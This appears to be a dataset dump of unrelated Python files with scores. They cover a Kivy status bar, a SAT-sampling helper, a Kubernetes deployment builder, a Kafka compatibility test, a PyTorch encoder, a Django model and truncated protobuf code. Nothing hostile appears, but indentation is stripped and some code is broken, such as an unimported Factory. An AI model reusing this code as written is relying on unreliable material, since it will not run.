from kivy.properties import NumericProperty, BooleanProperty
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.label import Label
from cobiv.modules.core.component import Component
class StatusLabel(Component, Label):
def __init__(self, **kwargs):
super(StatusLabel, self).__init__(valign='middle', **kwargs)
self.bind(size=self.setter('text_size'))
self.session = self.get_session()
self.template_text = kwargs.get('text')
self.refresh()
def refresh(self):
if self.session is not None:
self.text = self.session.fill_text_fields(self.template_text)
else:
self.text = self.template_text
class StatusBar(Component, BoxLayout):
enabled = BooleanProperty(True)
def __init__(self, **kwargs):
height = kwargs.pop('height', 20)
super().__init__(size_hint=(1, None), height=height, **kwargs)
self.session = self.get_session()
if self.session is not None:
self.session.cursor.bind(file_id=self.on_file_id_change)
self.bind(enabled=self.set_enabled)
def set_enabled(self, instance, value):
if value:
self.bind_cursor()
else:
self.unbind_cursor()
def on_file_id_change(self, instance, value):
self.refresh_widgets()
def refresh_widgets(self):
for c in self.children:
refresh = getattr(c, 'refresh', None)
if refresh is not None:
c.refresh()
def add_label(self, text='', align='center', size=0, **kwargs):
if size == 0:
label = StatusLabel(text=text, halign=align)
else:
label = StatusLabel(text=text, halign=align, width=size, size_hint=(None, 1))
self.add_widget(label)
def init_items(self, config_items):
for cfg_item in config_items:
self.add_label(**cfg_item)
def bind_cursor(self):
pass
def unbind_cursor(self):
pass
Factory.register('SimpleStatusBar', cls=StatusBar) | 0.61659 | 0.081374 |
import tempfile
import numpy as np
from numpy import count_nonzero
import os
def computeBias(Xvar,Yvar,sampling_cnf, sampling_weights_y_1, sampling_weights_y_0, inputfile_name, SkolemKnown, args):
samples_biased_one = generatesample( args, 500, sampling_cnf + sampling_weights_y_1, inputfile_name, 1)
samples_biased_zero = generatesample( args, 500, sampling_cnf + sampling_weights_y_0, inputfile_name, 1)
bias = ""
for yvar in Yvar:
if yvar in SkolemKnown:
continue
count_one = count_nonzero(samples_biased_one[:,yvar-1])
p = round(float(count_one)/500,2)
count_zero = count_nonzero(samples_biased_zero[:,yvar-1])
q = round(float(count_zero)/500,2)
if 0.35 < p < 0.65 and 0.35 < q < 0.65:
bias += "w %s %s\n" %(yvar,p)
elif q <= 0.35:
if float(q) == 0.0:
q = 0.001
bias += "w %s %s\n" %(yvar,q)
else:
if float(p) == 1.0:
p = 0.99
bias += "w %s %s\n" %(yvar,p)
return sampling_cnf + bias
def generatesample(args, num_samples, sampling_cnf, inputfile_name, weighted):
tempcnffile = tempfile.gettempdir() + '/' + inputfile_name + "_sample.cnf"
with open (tempcnffile,"w") as f:
f.write(sampling_cnf)
f.close()
tempoutputfile = tempfile.gettempdir() + '/' + inputfile_name + "_.txt"
if weighted:
cmd = "./dependencies/cryptominisat5 -n1 --sls 0 --comps 0"
cmd += " --restart luby --nobansol --maple 0 --presimp 0"
cmd += " --polar weight --freq 0.9999 --verb 0 --scc 0"
cmd += " --random %s --maxsol %s > /dev/null 2>&1" % (args.seed, int(num_samples))
cmd += " %s" % (tempcnffile)
cmd += " --dumpresult %s " % (tempoutputfile)
else:
cmd = "./dependencies/cryptominisat5 --restart luby"
cmd += " --maple 0 --verb 0 --nobansol"
cmd += " --scc 1 -n1 --presimp 0 --polar rnd --freq 0.9999"
cmd += " --random %s --maxsol %s" % (args.seed, int(num_samples))
cmd += " %s" % (tempcnffile)
cmd += " --dumpresult %s > /dev/null 2>&1" % (tempoutputfile)
os.system(cmd)
with open(tempoutputfile,"r") as f:
content = f.read()
f.close()
os.unlink(tempoutputfile)
os.unlink(tempcnffile)
content = content.replace("SAT\n","").replace("\n"," ").strip(" \n").strip(" ")
models = content.split(" ")
models = np.array(models)
if models[len(models)-1] != "0":
models = np.delete(models, len(models) - 1, axis=0)
if len(np.where(models == "0")[0]) > 0:
index = np.where(models == "0")[0][0]
var_model = np.reshape(models, (-1, index+1)).astype(np.int)
var_model = var_model > 0
var_model = np.delete(var_model, index, axis=1)
var_model = var_model.astype(np.int)
return var_model | src/generateSamples.py | import tempfile
import numpy as np
from numpy import count_nonzero
import os
def computeBias(Xvar,Yvar,sampling_cnf, sampling_weights_y_1, sampling_weights_y_0, inputfile_name, SkolemKnown, args):
samples_biased_one = generatesample( args, 500, sampling_cnf + sampling_weights_y_1, inputfile_name, 1)
samples_biased_zero = generatesample( args, 500, sampling_cnf + sampling_weights_y_0, inputfile_name, 1)
bias = ""
for yvar in Yvar:
if yvar in SkolemKnown:
continue
count_one = count_nonzero(samples_biased_one[:,yvar-1])
p = round(float(count_one)/500,2)
count_zero = count_nonzero(samples_biased_zero[:,yvar-1])
q = round(float(count_zero)/500,2)
if 0.35 < p < 0.65 and 0.35 < q < 0.65:
bias += "w %s %s\n" %(yvar,p)
elif q <= 0.35:
if float(q) == 0.0:
q = 0.001
bias += "w %s %s\n" %(yvar,q)
else:
if float(p) == 1.0:
p = 0.99
bias += "w %s %s\n" %(yvar,p)
return sampling_cnf + bias
def generatesample(args, num_samples, sampling_cnf, inputfile_name, weighted):
tempcnffile = tempfile.gettempdir() + '/' + inputfile_name + "_sample.cnf"
with open (tempcnffile,"w") as f:
f.write(sampling_cnf)
f.close()
tempoutputfile = tempfile.gettempdir() + '/' + inputfile_name + "_.txt"
if weighted:
cmd = "./dependencies/cryptominisat5 -n1 --sls 0 --comps 0"
cmd += " --restart luby --nobansol --maple 0 --presimp 0"
cmd += " --polar weight --freq 0.9999 --verb 0 --scc 0"
cmd += " --random %s --maxsol %s > /dev/null 2>&1" % (args.seed, int(num_samples))
cmd += " %s" % (tempcnffile)
cmd += " --dumpresult %s " % (tempoutputfile)
else:
cmd = "./dependencies/cryptominisat5 --restart luby"
cmd += " --maple 0 --verb 0 --nobansol"
cmd += " --scc 1 -n1 --presimp 0 --polar rnd --freq 0.9999"
cmd += " --random %s --maxsol %s" % (args.seed, int(num_samples))
cmd += " %s" % (tempcnffile)
cmd += " --dumpresult %s > /dev/null 2>&1" % (tempoutputfile)
os.system(cmd)
with open(tempoutputfile,"r") as f:
content = f.read()
f.close()
os.unlink(tempoutputfile)
os.unlink(tempcnffile)
content = content.replace("SAT\n","").replace("\n"," ").strip(" \n").strip(" ")
models = content.split(" ")
models = np.array(models)
if models[len(models)-1] != "0":
models = np.delete(models, len(models) - 1, axis=0)
if len(np.where(models == "0")[0]) > 0:
index = np.where(models == "0")[0][0]
var_model = np.reshape(models, (-1, index+1)).astype(np.int)
var_model = var_model > 0
var_model = np.delete(var_model, index, axis=1)
var_model = var_model.astype(np.int)
return var_model | 0.185099 | 0.281603 |
from __future__ import annotations
from imports import k8s
from cdk8s import Chart
from kubeasy_sdk.container import Container
from kubeasy_sdk.utils.collections.containers import Containers
from kubeasy_sdk.utils.resource import Rendered
from kubeasy_sdk.volume import Volume
from kubeasy_sdk.utils.collections.volumes import Volumes
from kubeasy_sdk.utils.security import SecurityContext
class Deployment(Rendered):
def __init__(self, name: str, namespace: str, environment: str, replicas: int = 1):
func_locals = dict(locals())
del func_locals['self']
super().__init__(**func_locals)
self.name = name
self.namespace = namespace
self.environment = environment
self.replicas = replicas
self.labels = {}
self.match_labels = {}
self.image_pull_policy = None
self.image_pull_secrets = []
self.pod_fs_gid = None
self.init_containers = Containers()
self.containers = Containers()
self.volumes = Volumes()
# Security Context
self.security_context = SecurityContext()
def set_replicas(self, replicas: int) -> Deployment:
self.replicas = replicas
return self
# Deployment Labels
def set_labels(self, labels: dict[str]) -> Deployment:
self.labels = labels
return self
def add_label(self, key: str, value: str) -> Deployment:
self.labels[key] = value
return self
# Deployment Match Labels
def set_match_labels(self, match_labels: dict[str]) -> Deployment:
self.match_labels = match_labels
return self
def add_match_label(self, key: str, value: str) -> Deployment:
self.match_labels[key] = value
return self
# === Security Settings ===
# Image Policies
def set_image_pull_policy(self, pull_policy: str) -> Deployment:
self.image_pull_policy = pull_policy
return self
def add_image_pull_secret(self, pull_secret: str) -> Deployment:
self.image_pull_secrets.append(k8s.LocalObjectReference(name=pull_secret))
return self
def set_pod_fs_gid(self, pod_fs_gid: int) -> Deployment:
self.pod_fs_gid = pod_fs_gid
return self
# Containers
def add_container(self, container: Container) -> Container:
self.containers.add_container(container)
return container
# Init Containers
def add_init_container(self, container: Container) -> Container:
self.init_containers.add_container(container)
return container
# Volume Mounts
def include_volume(self, volume: Volume) -> Volume:
self.volumes.add_volume(volume)
return volume
def render_k8s_resource(self, chart: Chart) -> Deployment:
# Create the metadata and label selectors for the deployment
object_meta = k8s.ObjectMeta(labels=self.labels)
label_selector = k8s.LabelSelector(match_labels=self.match_labels)
# Generate the podspec templates for the deployment
podspec = k8s.PodSpec(init_containers=self.init_containers.render(chart),
image_pull_secrets=self.image_pull_secrets,
containers=self.containers.render(chart),
volumes=self.volumes.render(chart))
podspec_template = k8s.PodTemplateSpec(metadata=object_meta,
spec=podspec)
# Use the podspec to create the deployment spec before finally returning the completed K8s Deployment.
deployment_spec = k8s.DeploymentSpec(replicas=self.replicas, selector=label_selector, template=podspec_template)
k8s.Deployment(chart, 'deployment', metadata=k8s.ObjectMeta(name=self.name), spec=deployment_spec)
return self | kubeasy_sdk/deployment.py | from __future__ import annotations
from imports import k8s
from cdk8s import Chart
from kubeasy_sdk.container import Container
from kubeasy_sdk.utils.collections.containers import Containers
from kubeasy_sdk.utils.resource import Rendered
from kubeasy_sdk.volume import Volume
from kubeasy_sdk.utils.collections.volumes import Volumes
from kubeasy_sdk.utils.security import SecurityContext
class Deployment(Rendered):
def __init__(self, name: str, namespace: str, environment: str, replicas: int = 1):
func_locals = dict(locals())
del func_locals['self']
super().__init__(**func_locals)
self.name = name
self.namespace = namespace
self.environment = environment
self.replicas = replicas
self.labels = {}
self.match_labels = {}
self.image_pull_policy = None
self.image_pull_secrets = []
self.pod_fs_gid = None
self.init_containers = Containers()
self.containers = Containers()
self.volumes = Volumes()
# Security Context
self.security_context = SecurityContext()
def set_replicas(self, replicas: int) -> Deployment:
self.replicas = replicas
return self
# Deployment Labels
def set_labels(self, labels: dict[str]) -> Deployment:
self.labels = labels
return self
def add_label(self, key: str, value: str) -> Deployment:
self.labels[key] = value
return self
# Deployment Match Labels
def set_match_labels(self, match_labels: dict[str]) -> Deployment:
self.match_labels = match_labels
return self
def add_match_label(self, key: str, value: str) -> Deployment:
self.match_labels[key] = value
return self
# === Security Settings ===
# Image Policies
def set_image_pull_policy(self, pull_policy: str) -> Deployment:
self.image_pull_policy = pull_policy
return self
def add_image_pull_secret(self, pull_secret: str) -> Deployment:
self.image_pull_secrets.append(k8s.LocalObjectReference(name=pull_secret))
return self
def set_pod_fs_gid(self, pod_fs_gid: int) -> Deployment:
self.pod_fs_gid = pod_fs_gid
return self
# Containers
def add_container(self, container: Container) -> Container:
self.containers.add_container(container)
return container
# Init Containers
def add_init_container(self, container: Container) -> Container:
self.init_containers.add_container(container)
return container
# Volume Mounts
def include_volume(self, volume: Volume) -> Volume:
self.volumes.add_volume(volume)
return volume
def render_k8s_resource(self, chart: Chart) -> Deployment:
# Create the metadata and label selectors for the deployment
object_meta = k8s.ObjectMeta(labels=self.labels)
label_selector = k8s.LabelSelector(match_labels=self.match_labels)
# Generate the podspec templates for the deployment
podspec = k8s.PodSpec(init_containers=self.init_containers.render(chart),
image_pull_secrets=self.image_pull_secrets,
containers=self.containers.render(chart),
volumes=self.volumes.render(chart))
podspec_template = k8s.PodTemplateSpec(metadata=object_meta,
spec=podspec)
# Use the podspec to create the deployment spec before finally returning the completed K8s Deployment.
deployment_spec = k8s.DeploymentSpec(replicas=self.replicas, selector=label_selector, template=podspec_template)
k8s.Deployment(chart, 'deployment', metadata=k8s.ObjectMeta(name=self.name), spec=deployment_spec)
return self | 0.773388 | 0.257993 |
from ducktape.tests.test import Test
from kafkatest.services.zookeeper import ZookeeperService
from kafkatest.services.kafka import KafkaService
from kafkatest.services.kafka.version import LATEST_0_8_2, TRUNK
from kafkatest.services.verifiable_producer import VerifiableProducer
from kafkatest.services.console_consumer import ConsoleConsumer, is_int
class ClientCompatibilityTest(Test):
def __init__(self, test_context):
super(ClientCompatibilityTest, self).__init__(test_context=test_context)
def setUp(self):
self.topic = "test_topic"
self.zk = ZookeeperService(self.test_context, num_nodes=1)
self.kafka = KafkaService(self.test_context, num_nodes=3, zk=self.zk, version=LATEST_0_8_2, topics={self.topic: {
"partitions": 3,
"replication-factor": 3,
"min.insync.replicas": 2}})
self.zk.start()
self.kafka.start()
# Producer and consumer
self.producer_throughput = 10000
self.num_producers = 1
self.num_consumers = 1
def test_producer_back_compatibility(self):
"""Run 0.9.X java producer against 0.8.X brokers.
This test documents the fact that java producer v0.9.0.0 and later won't run against 0.8.X brokers
the broker responds to a V1 produce request with a V0 fetch response; the client then tries to parse this V0
produce response as a V1 produce response, resulting in a BufferUnderflowException
"""
self.producer = VerifiableProducer(
self.test_context, self.num_producers, self.kafka, self.topic, max_messages=100,
throughput=self.producer_throughput, version=TRUNK)
node = self.producer.nodes[0]
try:
self.producer.start()
self.producer.wait()
raise Exception("0.9.X java producer should not run successfully against 0.8.X broker")
except:
# Expected
pass
finally:
self.producer.kill_node(node, clean_shutdown=False)
self.logger.info("Grepping producer log for expected error type")
node.account.ssh("egrep -m 1 %s %s" % ("\"org\.apache\.kafka\.common\.protocol\.types\.SchemaException.*throttle_time_ms.*: java\.nio\.BufferUnderflowException\"", self.producer.LOG_FILE), allow_fail=False)
def test_consumer_back_compatibility(self):
"""Run the scala 0.8.X consumer against an 0.9.X cluster.
Expect 0.8.X scala consumer to fail with buffer underflow. This error is the same as when an 0.9.X producer
is run against an 0.8.X broker: the broker responds to a V1 fetch request with a V0 fetch response; the
client then tries to parse this V0 fetch response as a V1 fetch response, resulting in a BufferUnderflowException
"""
num_messages = 10
self.producer = VerifiableProducer(
self.test_context, self.num_producers, self.kafka, self.topic, max_messages=num_messages,
throughput=self.producer_throughput, version=LATEST_0_8_2)
self.consumer = ConsoleConsumer(
self.test_context, self.num_consumers, self.kafka, self.topic, group_id="consumer-09X",
consumer_timeout_ms=10000, message_validator=is_int, version=TRUNK)
self.old_consumer = ConsoleConsumer(
self.test_context, self.num_consumers, self.kafka, self.topic, group_id="consumer-08X",
consumer_timeout_ms=10000, message_validator=is_int, version=LATEST_0_8_2)
self.producer.run()
self.consumer.run()
self.old_consumer.run()
consumed = len(self.consumer.messages_consumed[1])
old_consumed = len(self.old_consumer.messages_consumed[1])
assert old_consumed == num_messages, "Expected 0.8.X scala consumer to consume %d, but only got %d" % (num_messages, old_consumed)
assert consumed == 0, "Expected 0.9.X scala consumer to fail to consume any messages, but got %d" % consumed
self.logger.info("Grepping consumer log for expected error type")
node = self.consumer.nodes[0]
node.account.ssh("egrep -m 1 %s %s" % ("\"java\.nio\.BufferUnderflowException\"", self.consumer.LOG_FILE), allow_fail=False) | tests/kafkatest/tests/compatibility_test.py |
from ducktape.tests.test import Test
from kafkatest.services.zookeeper import ZookeeperService
from kafkatest.services.kafka import KafkaService
from kafkatest.services.kafka.version import LATEST_0_8_2, TRUNK
from kafkatest.services.verifiable_producer import VerifiableProducer
from kafkatest.services.console_consumer import ConsoleConsumer, is_int
class ClientCompatibilityTest(Test):
def __init__(self, test_context):
super(ClientCompatibilityTest, self).__init__(test_context=test_context)
def setUp(self):
self.topic = "test_topic"
self.zk = ZookeeperService(self.test_context, num_nodes=1)
self.kafka = KafkaService(self.test_context, num_nodes=3, zk=self.zk, version=LATEST_0_8_2, topics={self.topic: {
"partitions": 3,
"replication-factor": 3,
"min.insync.replicas": 2}})
self.zk.start()
self.kafka.start()
# Producer and consumer
self.producer_throughput = 10000
self.num_producers = 1
self.num_consumers = 1
def test_producer_back_compatibility(self):
"""Run 0.9.X java producer against 0.8.X brokers.
This test documents the fact that java producer v0.9.0.0 and later won't run against 0.8.X brokers
the broker responds to a V1 produce request with a V0 fetch response; the client then tries to parse this V0
produce response as a V1 produce response, resulting in a BufferUnderflowException
"""
self.producer = VerifiableProducer(
self.test_context, self.num_producers, self.kafka, self.topic, max_messages=100,
throughput=self.producer_throughput, version=TRUNK)
node = self.producer.nodes[0]
try:
self.producer.start()
self.producer.wait()
raise Exception("0.9.X java producer should not run successfully against 0.8.X broker")
except:
# Expected
pass
finally:
self.producer.kill_node(node, clean_shutdown=False)
self.logger.info("Grepping producer log for expected error type")
node.account.ssh("egrep -m 1 %s %s" % ("\"org\.apache\.kafka\.common\.protocol\.types\.SchemaException.*throttle_time_ms.*: java\.nio\.BufferUnderflowException\"", self.producer.LOG_FILE), allow_fail=False)
def test_consumer_back_compatibility(self):
"""Run the scala 0.8.X consumer against an 0.9.X cluster.
Expect 0.8.X scala consumer to fail with buffer underflow. This error is the same as when an 0.9.X producer
is run against an 0.8.X broker: the broker responds to a V1 fetch request with a V0 fetch response; the
client then tries to parse this V0 fetch response as a V1 fetch response, resulting in a BufferUnderflowException
"""
num_messages = 10
self.producer = VerifiableProducer(
self.test_context, self.num_producers, self.kafka, self.topic, max_messages=num_messages,
throughput=self.producer_throughput, version=LATEST_0_8_2)
self.consumer = ConsoleConsumer(
self.test_context, self.num_consumers, self.kafka, self.topic, group_id="consumer-09X",
consumer_timeout_ms=10000, message_validator=is_int, version=TRUNK)
self.old_consumer = ConsoleConsumer(
self.test_context, self.num_consumers, self.kafka, self.topic, group_id="consumer-08X",
consumer_timeout_ms=10000, message_validator=is_int, version=LATEST_0_8_2)
self.producer.run()
self.consumer.run()
self.old_consumer.run()
consumed = len(self.consumer.messages_consumed[1])
old_consumed = len(self.old_consumer.messages_consumed[1])
assert old_consumed == num_messages, "Expected 0.8.X scala consumer to consume %d, but only got %d" % (num_messages, old_consumed)
assert consumed == 0, "Expected 0.9.X scala consumer to fail to consume any messages, but got %d" % consumed
self.logger.info("Grepping consumer log for expected error type")
node = self.consumer.nodes[0]
node.account.ssh("egrep -m 1 %s %s" % ("\"java\.nio\.BufferUnderflowException\"", self.consumer.LOG_FILE), allow_fail=False) | 0.677367 | 0.23268 |
import torch
from torch import nn
from .attention import CustomMultiHeadAttention
from .blocks import PositionwiseFeedForward, CustomLayerNorm
from .position_layers import PositionEncoding
class CustomEncoderLayer(nn.Module):
def __init__(self, dim, n_head, ffn_hidden=None, dropout=0.0):
"""
Encoder block
:param dim: Embedding dimension
:param n_head: Number of head in multi head attention
:param ffn_hidden: Number of hidden nodes of feed forward layer
:param dropout: Dropout rate in the block
"""
super(CustomEncoderLayer, self).__init__()
self.multiheadatt = CustomMultiHeadAttention(dim, n_head)
self.norm1 = CustomLayerNorm(dim)
self.dropout1 = nn.Dropout(p=dropout)
self.ffn = PositionwiseFeedForward(dim, ffn_hidden, dropout=dropout)
self.norm2 = CustomLayerNorm(dim)
self.dropout2 = nn.Dropout(p=dropout)
def forward(self, x, mask=None):
# Compute attention
_x = x
x = self.multiheadatt(x, x, x, mask=mask)
# add norm
x = self.norm1(x + _x)
x = self.dropout1(x)
# feed forward
_x = x
x = self.ffn(x)
# add norm
x = self.norm2(x + _x)
x = self.dropout2(x)
return x
class CustomEncoder(nn.Module):
def __init__(self, vocab_size, max_len, dim, ffn_hidden, n_head, n_layers, dropout=0.1):
"""
Encoder (n x encode layer)
:param vocab_size: Input vocab size for embedding
:param max_len: Maximum length of position embedding
:param dim: Embedding dimension
:param ffn_hidden: Number of hidden nodes of feed forward layer
:param n_head: Number of head in multi head attention
:param n_layers: Number of repeated encoder layers
:param dropout: Dropout rate of encoder
"""
super(CustomEncoder, self).__init__()
self.embed = nn.Embedding(vocab_size, dim, padding_idx=1)
self.position = PositionEncoding(dim, dropout=dropout, max_len=max_len)
self.layers = nn.ModuleList([CustomEncoderLayer(dim,
n_head,
ffn_hidden,
dropout)
for _ in range(n_layers)])
def forward(self, x, mask=None):
x = self.embed(x)
x = self.position(x)
for layer in self.layers:
x = layer(x, mask)
return x | modules/encoder.py | import torch
from torch import nn
from .attention import CustomMultiHeadAttention
from .blocks import PositionwiseFeedForward, CustomLayerNorm
from .position_layers import PositionEncoding
class CustomEncoderLayer(nn.Module):
def __init__(self, dim, n_head, ffn_hidden=None, dropout=0.0):
"""
Encoder block
:param dim: Embedding dimension
:param n_head: Number of head in multi head attention
:param ffn_hidden: Number of hidden nodes of feed forward layer
:param dropout: Dropout rate in the block
"""
super(CustomEncoderLayer, self).__init__()
self.multiheadatt = CustomMultiHeadAttention(dim, n_head)
self.norm1 = CustomLayerNorm(dim)
self.dropout1 = nn.Dropout(p=dropout)
self.ffn = PositionwiseFeedForward(dim, ffn_hidden, dropout=dropout)
self.norm2 = CustomLayerNorm(dim)
self.dropout2 = nn.Dropout(p=dropout)
def forward(self, x, mask=None):
# Compute attention
_x = x
x = self.multiheadatt(x, x, x, mask=mask)
# add norm
x = self.norm1(x + _x)
x = self.dropout1(x)
# feed forward
_x = x
x = self.ffn(x)
# add norm
x = self.norm2(x + _x)
x = self.dropout2(x)
return x
class CustomEncoder(nn.Module):
def __init__(self, vocab_size, max_len, dim, ffn_hidden, n_head, n_layers, dropout=0.1):
"""
Encoder (n x encode layer)
:param vocab_size: Input vocab size for embedding
:param max_len: Maximum length of position embedding
:param dim: Embedding dimension
:param ffn_hidden: Number of hidden nodes of feed forward layer
:param n_head: Number of head in multi head attention
:param n_layers: Number of repeated encoder layers
:param dropout: Dropout rate of encoder
"""
super(CustomEncoder, self).__init__()
self.embed = nn.Embedding(vocab_size, dim, padding_idx=1)
self.position = PositionEncoding(dim, dropout=dropout, max_len=max_len)
self.layers = nn.ModuleList([CustomEncoderLayer(dim,
n_head,
ffn_hidden,
dropout)
for _ in range(n_layers)])
def forward(self, x, mask=None):
x = self.embed(x)
x = self.position(x)
for layer in self.layers:
x = layer(x, mask)
return x | 0.957308 | 0.340293 |
import logging
from django.db import models
from jsonfield import JSONField
from ...bases.metadata.models import BaseListingItemRelation
logger = logging.getLogger(__name__)
class EmbeddedInfo(models.Model):
path = models.CharField(max_length=500)
query_key = models.CharField(max_length=50)
index = models.IntegerField(null=True)
title = models.CharField(max_length=300, null=True)
cover = models.URLField(null=True, max_length=1000)
year = models.IntegerField(null=True)
plot = models.TextField(null=True)
duration = models.IntegerField(null=True)
rating = models.DecimalField(null=True, decimal_places=2, max_digits=3)
genres = JSONField(default=[])
primary_language = models.CharField(max_length=50, null=True)
file_source = models.CharField(null=True, max_length=100)
group = models.CharField(max_length=300, null=True)
mediainfo_resolution = models.CharField(null=True, max_length=100)
mediainfo_codec = models.CharField(null=True, max_length=100)
mediainfo_container = models.CharField(null=True, max_length=100)
mediainfo_source = models.CharField(null=True, max_length=100)
mediainfo_scene = models.BooleanField(default=False)
mediainfo_dual_audio = models.BooleanField(default=False)
mediainfo_audio = models.CharField(null=True, max_length=100)
mediainfo_best = models.BooleanField(
default=False
) # probably the best choice if you have to choose
bittorrent_seeders = models.IntegerField(null=True)
bittorrent_leechers = models.IntegerField(null=True)
bittorrent_snatched = models.IntegerField(null=True)
episodeinfo_episode_type = models.CharField(max_length=200, blank=True, null=True)
episodeinfo_season = models.IntegerField(blank=True, null=True)
episodeinfo_episode = models.IntegerField(blank=True, null=True)
episodeinfo_year = models.IntegerField(blank=True, null=True)
episodeinfo_month = models.IntegerField(blank=True, null=True)
episodeinfo_day = models.IntegerField(blank=True, null=True)
episodeinfo_sub_title = models.CharField(max_length=150, blank=True, null=True)
datetime = models.DateTimeField(auto_now=True)
class Meta:
unique_together = (("query_key", "path"),)
@property
def metadata_name(self):
return "embedded"
@property
def identifier(self):
return self.pk
def set_available(self):
if self.file_source == "bittorrent":
self.bittorrent_available = True
self.save()
class ListingItemRelation(BaseListingItemRelation):
metadata = models.ForeignKey(EmbeddedInfo, on_delete=models.CASCADE) | tridentstream/metadata/embedded/models.py | import logging
from django.db import models
from jsonfield import JSONField
from ...bases.metadata.models import BaseListingItemRelation
logger = logging.getLogger(__name__)
class EmbeddedInfo(models.Model):
path = models.CharField(max_length=500)
query_key = models.CharField(max_length=50)
index = models.IntegerField(null=True)
title = models.CharField(max_length=300, null=True)
cover = models.URLField(null=True, max_length=1000)
year = models.IntegerField(null=True)
plot = models.TextField(null=True)
duration = models.IntegerField(null=True)
rating = models.DecimalField(null=True, decimal_places=2, max_digits=3)
genres = JSONField(default=[])
primary_language = models.CharField(max_length=50, null=True)
file_source = models.CharField(null=True, max_length=100)
group = models.CharField(max_length=300, null=True)
mediainfo_resolution = models.CharField(null=True, max_length=100)
mediainfo_codec = models.CharField(null=True, max_length=100)
mediainfo_container = models.CharField(null=True, max_length=100)
mediainfo_source = models.CharField(null=True, max_length=100)
mediainfo_scene = models.BooleanField(default=False)
mediainfo_dual_audio = models.BooleanField(default=False)
mediainfo_audio = models.CharField(null=True, max_length=100)
mediainfo_best = models.BooleanField(
default=False
) # probably the best choice if you have to choose
bittorrent_seeders = models.IntegerField(null=True)
bittorrent_leechers = models.IntegerField(null=True)
bittorrent_snatched = models.IntegerField(null=True)
episodeinfo_episode_type = models.CharField(max_length=200, blank=True, null=True)
episodeinfo_season = models.IntegerField(blank=True, null=True)
episodeinfo_episode = models.IntegerField(blank=True, null=True)
episodeinfo_year = models.IntegerField(blank=True, null=True)
episodeinfo_month = models.IntegerField(blank=True, null=True)
episodeinfo_day = models.IntegerField(blank=True, null=True)
episodeinfo_sub_title = models.CharField(max_length=150, blank=True, null=True)
datetime = models.DateTimeField(auto_now=True)
class Meta:
unique_together = (("query_key", "path"),)
@property
def metadata_name(self):
return "embedded"
@property
def identifier(self):
return self.pk
def set_available(self):
if self.file_source == "bittorrent":
self.bittorrent_available = True
self.save()
class ListingItemRelation(BaseListingItemRelation):
metadata = models.ForeignKey(EmbeddedInfo, on_delete=models.CASCADE) | 0.494629 | 0.20458 |
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='effects.proto',
package='effects',
syntax='proto3',
serialized_pb=_b('\n\reffects.proto\x12\x07\x65\x66\x66\x65\x63ts\"!\n\x10\x44\x65ltaModificator\x12\r\n\x05\x64\x65lta\x18\x01 \x01(\t\"e\n\x06\x45\x66\x66\x65\x63t\x12\n\n\x02id\x18\x01 \x01(\x03\x12\x11\n\tattribute\x18\x02 \x01(\x03\x12\x0e\n\x06\x65ntity\x18\x03 \x01(\x03\x12\r\n\x05value\x18\x04 \x01(\t\x12\x0f\n\x07\x63\x61ption\x18\x05 \x01(\t\x12\x0c\n\x04\x64\x61ta\x18\x06 \x01(\t\"2\n\x0fRegisterRequest\x12\x1f\n\x06\x65\x66\x66\x65\x63t\x18\x01 \x01(\x0b\x32\x0f.effects.Effect\"%\n\x10RegisterResponse\x12\x11\n\teffect_id\x18\x01 \x01(\x03\"\"\n\rRemoveRequest\x12\x11\n\teffect_id\x18\x01 \x01(\x03\"\x10\n\x0eRemoveResponse\"0\n\rUpdateRequest\x12\x1f\n\x06\x65\x66\x66\x65\x63t\x18\x01 \x01(\x0b\x32\x0f.effects.Effect\"\x10\n\x0eUpdateResponse\"\r\n\x0bListRequest\"0\n\x0cListResponse\x12 \n\x07\x65\x66\x66\x65\x63ts\x18\x01 \x03(\x0b\x32\x0f.effects.Effect\"\x1a\n\x18\x44\x65\x62ugClearServiceRequest\"\x1b\n\x19\x44\x65\x62ugClearServiceResponseb\x06proto3')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_DELTAMODIFICATOR = _descriptor.Descriptor(
name='DeltaModificator',
full_name='effects.DeltaModificator',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='delta', full_name='effects.DeltaModificator.delta', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=26,
serialized_end=59,
)
_EFFECT = _descriptor.Descriptor(
name='Effect',
full_name='effects.Effect',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='effects.Effect.id', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='attribute', full_name='effects.Effect.attribute', index=1,
number=2, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='entity', full_name='effects.Effect.entity', index=2,
number=3, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='effects.Effect.value', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='caption', full_name='effects.Effect.caption', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='data', full_name='effects.Effect.data', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
